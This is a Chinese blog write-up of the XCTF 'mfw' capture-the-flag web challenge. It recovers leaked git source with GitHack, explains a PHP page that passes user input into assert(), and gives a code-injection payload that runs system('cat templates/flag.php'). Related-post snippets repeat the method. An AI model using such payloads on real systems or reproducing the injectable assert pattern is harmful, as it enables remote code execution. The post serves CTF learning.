XCTF-web-mfw

于 2025-05-28 15:43:16 发布
阅读量335 收藏
点赞数 3
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52273419/article/details/148284799
版权

在这里插入图片描述

发现了git

在这里插入图片描述

使用GitHack下载一下源文件,找到了php源代码

<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

解析

<?php
// 获取GET参数中的page值,如果不存在则默认为"home"
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    $page = "home";
}

// 拼接文件路径,将page值作为文件名
$file = "templates/" . $page . ".php";

// 安全检查:确保路径中不包含".."(目录遍历攻击防护)
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// 安全检查:确保文件存在
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

解题:

在这里插入图片描述

?page=').system(“cat templates/flag.php”);//

’)进行闭合
system(“cat templates/flag.php”)表示在系统中执行cat templates/flag.php命令,该命令用于查看templates目录下的flag.php文件内容

在源码中可以看到flag

在这里插入图片描述

pencek
关注
XCTF WEB mfw学习记录
m0_49762339的博客
01-20 301
一、考点: 1)git源码泄露 2)php代码审计 3)注入攻击 二、题解 步骤一: 访问http://220.249.52.134:39449/.git/发现存在git仓库源码泄露 步骤二: 使用GitHack工具下载泄露源码:python GitHack.py http://220.249.52.134:39449/.git/ 返回如下响应 index.php templates/about.php templates/contact.php templates/flag.php templates/
攻防世界-web高手进阶区
zji
04-25 6974
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
XCTF-攻防世界CTF平台-Web类——19、mfw(.Git源代码泄露、php的assert断言)
Onlyone_1314的博客
12-11 3983
打开题目地址: 是一个作者用php写的网站 在About页面,作者介绍他使用了Git、PHP、Bootstrap 之后我们查看页面源代码: 在每个页面的注释里都有一个隐藏页面:?page=flag,提示flag应该就在这个页面。我们也注意到home、contact和about页面都是通过访问index.php页面以GET方式的page参数来跳转页面的:?page=home、?page=contact、?page=about。 所以我们直接访问: http://111.200.241.244:60434
XCTF-MFW Git泄露,命令执行漏洞 详解
AAAAAAAAAAAA66的博客
11-15 1409
最近自学了1个月的CTFweb题,参加比赛一道题都没做出来,有点自闭,但还是告诉自己要慢慢来,有意向打CTF的同学可以私信,一起学习。 目录 题目 解题过程 总结 题目 解题过程 工具 思路 过程 总结 ...
XCTF web mfw
0of_blog
05-23 181
打开靶场,随便逛逛,看到about 它说它使用git,那么有没有一种可能,这是git泄露。访问试试 上githack 看到flag 查看index <?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous! assert(..
XCTF WEB mfw
A_dmin的博客
06-03 4574
XCTF WEB mfw 比赛打自闭了,需要好好学习 打开网页看见(猜测git源码泄露): 在URL后面加上./git发现: 使用脚本,在Linux环境中: pip install requests git clone https://github.com/wangyihang/GitHacker.git python GitHacker.py [Website] 得到源码: flag...
xctf攻防世界 Web高手进阶区 mfw
l8947943的博客
08-11 7631
题目给出的内容如图:一通点击后,发现链接中出现page=***的字样,说明page传参是重点,是问题的突破口。
攻防世界 - Web - Level 3 | mfw
Blue17 の 小窝
12-31 937
所以我们将眼光放向 assert () 函数,我们可以发现,assert () 函数中的内容是由 PHP 函数构成的字符串,而对方如果想要实现过滤,则这字符串格式的 PHP 函数,必然会执行,但内容既然是字符串,那是否说明了,我们可以通过代码注入的方式,更改字符串的内容,使其满足我们的需要?—— 我从零开始写的!通过 flag.php 里的内容,其实我们也可以发现,直接包含 flag.php 文件我们是无法看到 Flag 的,因为它是以赋值的形式保存的。通过页面的返回看,目标成功执行了我们传递的代码。
XCTF之新手Web题目
weixin_56306210的博客
09-21 1147
XCTF之新手Web题目
XCTF mfw wp
weixin_45253216的博客
01-09 369
2021.1.9 网安菜鸡今天来划水了! CTF题目属于萌新入门级,写下WP仅供自己总结练习,大佬请自行绕路,另外如果有师傅愿意有每日轻松一笑环结,还望不吝赐教。【狗头】 打开题目,是这样一个界面:欢迎来到我的网站,这是我自己写的。 然后没什么思路,挨个导航栏点击一下看看。 在about页面下,发现了这样有趣的东西: 他告诉我们他用了Git,服务端使用PHP脚本语言,前端框架使用了Bootstrap。 作为一个萌新,当然不知道有Git源码泄漏这个东西,于是乎百度一下。 ...
XCTF Web 记录(第四天、第五天)
ximo的博客
03-04 283
题目ics-05mfw ics-05 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 所以打开后直接点击设备维护中心,查看网页源码: 发现一可疑之处。 尝试使用伪协议读取index.php的源码: ?page=php://filter/read=convert.base64-encode/resource=index.php 得到base64加密的源码,解码得到(关键部分): <?php $page = $_GET[page]; if (isset($page)) {
20200109攻防世界WEB高手区题目一题多解全教程通关(13-18)
qq_45290991的博客
01-09 548
013unserialize3 经典的反序列化绕过wake_up魔术方法姿势,表示属性个数的值大于真实属性个数时,会绕过 _wakeup 函数的执行。我还是推荐官网的教程,实在太经典了,大爱❥(^_-)https://www.php.cn/php-weizijiaocheng-454909.html 一进去这道题,源码直接: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?c
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1912
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
功防世界Web高手进阶Writeup
秋叶依剑
11-17 929
攻防世界Web进阶区 文章目录攻防世界Web进阶区0x01. Cat解题思路附注0x02. ics-05解题思路0x03. mfw解题思路 0x01. Cat 难度系数 1.0 题目来源: XCTF 4th-WHCTF-2017 题目描述: 抓住那只猫 题目场景: http://111.198.29.45:43180/ 具体参见攻防世界 题目附件:无 解题思路 尝试提交空域名,返回I...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
宾馆CAD-长67.5米 宽72.3米 5层12092.36平米欧式宾馆建筑施工图【平立】.zip
06-03
宾馆CAD-长67.5米 宽72.3米 5层12092.36平米欧式宾馆建筑施工图【平立】.zip
一屋顶花园方案-公园广场景观CAD平面方案立面节点大样施工图.zip
06-03
一屋顶花园方案-公园广场景观CAD平面方案立面节点大样施工图.zip
宾馆CAD源文件-长60米 宽8米 5层宾馆建筑施工图【平立剖 各部分构造做法表 目录】.zip
06-03
宾馆CAD源文件-长60米 宽8米 5层宾馆建筑施工图【平立剖 各部分构造做法表 目录】.zip
宾馆CAD源文件-长37米 宽36.38米 13层框架剪力墙结三星级民航宾馆建施【平立剖 总平 楼梯 节点大样 门窗表 目录 室内装修表 说明】.zip
最新发布
06-03
宾馆CAD源文件-长37米 宽36.38米 13层框架剪力墙结三星级民航宾馆建施【平立剖 总平 楼梯 节点大样 门窗表 目录 室内装修表 说明】.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值